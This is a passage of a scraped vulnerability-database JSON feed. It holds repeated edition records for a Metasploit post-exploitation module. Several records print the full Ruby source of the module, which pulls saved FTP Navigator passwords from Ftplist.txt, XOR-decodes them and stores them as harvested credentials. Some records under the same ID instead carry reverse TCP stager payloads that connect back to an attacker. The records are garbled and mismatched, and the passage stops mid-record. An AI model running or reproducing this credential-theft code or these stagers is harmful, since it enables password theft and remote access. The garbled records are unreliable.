{"value": 3.1, "vector": "NONE", "modified": "2019-10-22T20:03:23"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:6F273BE7C5C81E40E6EA08BC776BE137", "THREATPOST:9BC1B113CDD3C86D30DEB5648D4DB177", "THREATPOST:ECBBC760BAA055828A0F3D6DBC582D3C", "THREATPOST:72087EB3ABB25B54CE68B425C1F4CADC", "THREATPOST:1322630273A25CA5A68246679553E2B8", "THREATPOST:418EA9E9939F4CFBA3A15A2E7D8E0BE7", "THREATPOST:F9BA31D8C203CF31B3F1F7E7DFE510DB"]}, {"type": "redhat", "idList": ["RHSA-2019:3172"]}, {"type": "pentestlab", "idList": ["PENTESTLAB:78488A0C01CCC6B8D496E26EDE45A96A"]}, {"type": "thn", "idList": ["THN:9269E53DB7E4D99ED8A3314F02869A30", "THN:2EA239A563021FDA23B32DF2CA26815D", "THN:37D2A611C6387CE0BB8AEC9A56E53244"]}, {"type": "krebs", "idList": ["KREBS:D42E4EB5A9D8FA6FCA9557A068E17515"]}, {"type": "mozilla", "idList": ["MFSA2019-34", "MFSA2019-33"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891968", "OPENVAS:1361412562310891967", "OPENVAS:1361412562310891961", "OPENVAS:1361412562310704546", "OPENVAS:1361412562310891962"]}], "modified": "2019-10-22T20:03:23"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-22T20:03:23", "differentElements": ["sourceData"], "edition": 55}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-22T22:06:20", "history": [], "viewCount": 23, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2019-10-22T22:06:20"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:6F273BE7C5C81E40E6EA08BC776BE137", "THREATPOST:9BC1B113CDD3C86D30DEB5648D4DB177", "THREATPOST:ECBBC760BAA055828A0F3D6DBC582D3C", "THREATPOST:72087EB3ABB25B54CE68B425C1F4CADC", "THREATPOST:1322630273A25CA5A68246679553E2B8", "THREATPOST:418EA9E9939F4CFBA3A15A2E7D8E0BE7", "THREATPOST:F9BA31D8C203CF31B3F1F7E7DFE510DB"]}, {"type": "redhat", "idList": ["RHSA-2019:3172"]}, {"type": "pentestlab", "idList": ["PENTESTLAB:78488A0C01CCC6B8D496E26EDE45A96A"]}, {"type": "thn", "idList": ["THN:9269E53DB7E4D99ED8A3314F02869A30", "THN:2EA239A563021FDA23B32DF2CA26815D", "THN:37D2A611C6387CE0BB8AEC9A56E53244"]}, {"type": "krebs", "idList": ["KREBS:D42E4EB5A9D8FA6FCA9557A068E17515"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891968", "OPENVAS:1361412562310891967", "OPENVAS:1361412562310891961", "OPENVAS:1361412562310704546", "OPENVAS:1361412562310891962"]}, {"type": "mozilla", "idList": ["MFSA2019-34", "MFSA2019-33"]}], "modified": "2019-10-22T22:06:20"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-22T22:06:20", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 56}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "8b62132010a2fa45c56ef5e4feb4cfcd", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", "description": "Spawn a piped command shell (staged). Connect back to the attacker\n", "published": "2012-12-31T21:29:21", "modified": "2018-02-15T21:10:26", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-24T20:38:27", "history": [], "viewCount": 23, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2019-10-24T20:38:27"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:02B66ECAA18F0C4821AC41C233CB415C", "THREATPOST:9EF4AAC9DF125EE14234F7047EB3D807", "THREATPOST:3D7ABC1C5B95C6E6C4D4530DD377DAC6"]}, {"type": "thn", "idList": ["THN:8CBC19625782464BAA6718811FE24DEC"]}, {"type": "talosblog", "idList": ["TALOSBLOG:D7D09A396225D95FB845A4CCD5DBCC78"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310883120", "OPENVAS:1361412562310113547", "OPENVAS:1361412562310883121", "OPENVAS:1361412562310844211", "OPENVAS:1361412562310891969", "OPENVAS:1361412562310883123", "OPENVAS:1361412562310883122", "OPENVAS:1361412562310883118", "OPENVAS:1361412562310883119"]}, {"type": "ics", "idList": ["ICSMA-19-297-01", "ICSA-19-057-01", "ICSA-19-297-01"]}, {"type": "exploitdb", "idList": ["EDB-ID:47543"]}, {"type": "cve", "idList": ["CVE-2019-18278", "CVE-2019-10461"]}], "modified": "2019-10-24T20:38:27"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4'\n\n\nmodule MetasploitModule\n\n CachedSize = 400\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4\n\n def self.handler_type_alias\n \"reverse_tcp_rc4\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' => { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-24T20:38:27", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 57}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-24T22:24:12", "history": [], "viewCount": 25, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2019-10-24T22:24:12"}, "dependencies": {"references": [{"type": "pentestlab", "idList": ["PENTESTLAB:A1F911BC438039F8685E5C966B7999AD", "PENTESTLAB:508C7BFC33007DD5DA1BD94CBF775BAB"]}, {"type": "thn", "idList": ["THN:E2D335C43887FF3014816DD8920F022B"]}, {"type": "mssecure", "idList": ["MSSECURE:8108072FD89C831ABBE85F91D7B72A67"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A3CB4739BB152A537615C08F517E53B4"]}, {"type": "securelist", "idList": ["SECURELIST:EE6C22CF54EB31DE241E9F3841017296"]}, {"type": "talosblog", "idList": ["TALOSBLOG:52329DD84EE71660C0348D2C03871DF8"]}, {"type": "nessus", "idList": ["FEDORA_2019-218018EC82.NASL", "FEDORA_2019-709C48A989.NASL", "FEDORA_2019-A87ABA290F.NASL", "FEDORA_2019-3E3954F44D.NASL", "FEDORA_2019-B88BD94CE8.NASL", "FEDORA_2019-B89D284D7D.NASL", "FEDORA_2019-78AA18E571.NASL", "FEDORA_2019-F21AD78845.NASL", "FEDORA_2019-E70F89FA34.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891973", "OPENVAS:1361412562310891974"]}, {"type": "talos", "idList": ["TALOS-2019-0848"]}, {"type": "kitploit", "idList": ["KITPLOIT:4619542818609617331"]}], "modified": "2019-10-24T22:24:12"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-24T22:24:12", "differentElements": ["modified", "published"], "edition": 58}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "42b4d3524402d6e13908603e4f955004", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-06T08:36:40", "history": [], "viewCount": 25, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2019-11-06T08:36:40"}, "dependencies": {"references": [{"type": "thn", "idList": ["THN:5D88277025F7B2D46222DBCC83D150A0", "THN:960DCF51C9F65091A09F7C0AD2BAFDB4"]}, {"type": "kitploit", "idList": ["KITPLOIT:6823923075224640689", "KITPLOIT:7323577050718865961"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2442-1"]}, {"type": "mssecure", "idList": ["MSSECURE:8FCF4524349D245E482CA41E05D49374"]}, {"type": "pentestlab", "idList": ["PENTESTLAB:7FC0B3AF2C61D27081C83008222CC849"]}, {"type": "securelist", "idList": ["SECURELIST:A9B8DE2088B27BD39ECB584643D2E9C2"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:81FA1E449744FD3B364AD648DA0FDBFC"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A175FE0E2B98D95C6789EC72C4AC3EE9", "TALOSBLOG:148BAB0DA5CB7C56251F6708A1BB6CE1"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3BE55E98005A88BB4C515B494707B549"]}, {"type": "nessus", "idList": ["UBUNTU_USN-4170-3.NASL"]}, {"type": "talos", "idList": ["TALOS-2019-0876", "TALOS-2019-0891"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155111", "PACKETSTORM:155102"]}, {"type": "exploitdb", "idList": ["EDB-ID:47584", "EDB-ID:47582"]}, {"type": "zeroscience", "idList": ["ZSL-2019-5541"]}], "modified": "2019-11-06T08:36:40"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-06T08:36:40", "differentElements": ["modified", "published"], "edition": 59}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-06T10:46:07", "history": [], "viewCount": 26, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2019-11-06T10:46:07"}, "dependencies": {"references": [{"type": "thn", "idList": ["THN:5D88277025F7B2D46222DBCC83D150A0", "THN:960DCF51C9F65091A09F7C0AD2BAFDB4"]}, {"type": "exploitdb", "idList": ["EDB-ID:47593", "EDB-ID:47594", "EDB-ID:47584"]}, {"type": "kitploit", "idList": ["KITPLOIT:6823923075224640689", "KITPLOIT:7323577050718865961"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2442-1"]}, {"type": "mssecure", "idList": ["MSSECURE:8FCF4524349D245E482CA41E05D49374"]}, {"type": "pentestlab", "idList": ["PENTESTLAB:7FC0B3AF2C61D27081C83008222CC849"]}, {"type": "securelist", "idList": ["SECURELIST:A9B8DE2088B27BD39ECB584643D2E9C2"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:81FA1E449744FD3B364AD648DA0FDBFC"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A175FE0E2B98D95C6789EC72C4AC3EE9", "TALOSBLOG:148BAB0DA5CB7C56251F6708A1BB6CE1"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3BE55E98005A88BB4C515B494707B549"]}, {"type": "talos", "idList": ["TALOS-2019-0876"]}, {"type": "nessus", "idList": ["UBUNTU_USN-4170-3.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155102", "PACKETSTORM:155111"]}, {"type": "ics", "idList": ["ICSA-19-134-01"]}], "modified": "2019-11-06T10:46:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-06T10:46:07", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 60}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cf90206b3e17ae40bd34a6dabc2c289c", "type": "metasploit", "bulletinFamily": "exploit", "title": "Command Shell, Java Reverse TCP Stager", "description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager\n", "published": "2010-07-20T00:53:24", "modified": "2017-11-21T19:53:33", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-13T23:04:48", "history": [], "viewCount": 26, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2019-11-06T10:46:07"}, "dependencies": {"references": [{"type": "thn", "idList": ["THN:5D88277025F7B2D46222DBCC83D150A0", "THN:960DCF51C9F65091A09F7C0AD2BAFDB4"]}, {"type": "exploitdb", "idList": ["EDB-ID:47593", "EDB-ID:47594", "EDB-ID:47584"]}, {"type": "kitploit", "idList": ["KITPLOIT:6823923075224640689", "KITPLOIT:7323577050718865961"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2442-1"]}, {"type": "mssecure", "idList": ["MSSECURE:8FCF4524349D245E482CA41E05D49374"]}, {"type": "pentestlab", "idList": ["PENTESTLAB:7FC0B3AF2C61D27081C83008222CC849"]}, {"type": "securelist", "idList": ["SECURELIST:A9B8DE2088B27BD39ECB584643D2E9C2"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:81FA1E449744FD3B364AD648DA0FDBFC"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A175FE0E2B98D95C6789EC72C4AC3EE9", "TALOSBLOG:148BAB0DA5CB7C56251F6708A1BB6CE1"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3BE55E98005A88BB4C515B494707B549"]}, {"type": "talos", "idList": ["TALOS-2019-0876"]}, {"type": "nessus", "idList": ["UBUNTU_USN-4170-3.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155102", "PACKETSTORM:155111"]}, {"type": "ics", "idList": ["ICSA-19-134-01"]}], "modified": "2019-11-06T10:46:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/java/reverse_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/java/reverse_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 5303\n\n include Msf::Payload::Stager\n include Msf::Payload::Java\n include Msf::Payload::Java::ReverseTcp\n\n def initialize(info={})\n super(merge_info(info,\n 'Name' => 'Java Reverse TCP Stager',\n 'Description' => 'Connect back stager',\n 'Author' => ['mihi', 'egypt'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'javasocket',\n 'Stager' => {'Payload' => ''}\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-13T23:04:48", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 61}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-14T01:37:59", "history": [], "viewCount": 27, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2019-11-14T01:37:59"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:9EE98E12D780AF59C7856D16571AEE78", "THREATPOST:5293ED4A454EC6487F8AA9DB9A0FF180", "THREATPOST:39B3585DBB67616A828A2DED65FEC55C"]}, {"type": "pentestlab", "idList": ["PENTESTLAB:90210EA04600D483F5D78427D8905F63"]}, {"type": "talosblog", "idList": ["TALOSBLOG:DF63CF8A7745F75D968C5BBD0363A6FA", "TALOSBLOG:538836F6296FBA878C771EB1DA80240A", "TALOSBLOG:884599E413AF093E6B8CD3A7C93CE38C"]}, {"type": "exploitdb", "idList": ["EDB-ID:47649", "EDB-ID:47656", "EDB-ID:47650"]}, {"type": "talos", "idList": ["TALOS-2019-0845"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155319"]}, {"type": "pentestit", "idList": ["PENTESTIT:889FE4883D8C5717A7A6B1AA489B6F3F"]}, {"type": "krebs", "idList": ["KREBS:F5ECCD2DD57FDBC0A6062FA0AB5371FB"]}, {"type": "cve", "idList": ["CVE-2019-5695", "CVE-2019-0719", "CVE-2019-1437", "CVE-2019-1439"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:DD6025BBF17CA8593AD10AFB5A4834A6"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:91FCE9434FEBAD3E701C317530323FD6"]}], "modified": "2019-11-14T01:37:59"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# 